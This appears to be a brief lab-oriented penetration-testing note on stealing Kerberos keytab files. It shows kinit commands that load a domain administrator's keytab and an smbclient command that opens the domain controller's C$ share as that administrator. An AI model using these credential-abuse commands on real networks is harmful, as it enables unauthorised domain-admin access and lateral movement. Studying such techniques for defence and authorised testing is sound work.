Stealing Keytab files

If we discover keytab files, we can use these maliciously to gain access to other systems as the domain administrator. To use the file in a script run by the root user, we will use the following syntax.

kinit [email protected] -k -t /tmp/administrator.keytab

Renew without entering pass

kinit -R

Now that our root user has the keytab files loaded, we can authenticate as the domain admin and access any resources they have access to. Let’s attempt to access the domain controller’s C drive.

smbclient -k -U "CORP1.COM\administrator" //DC01.CORP1.COM/C$

Last updated 1 year ago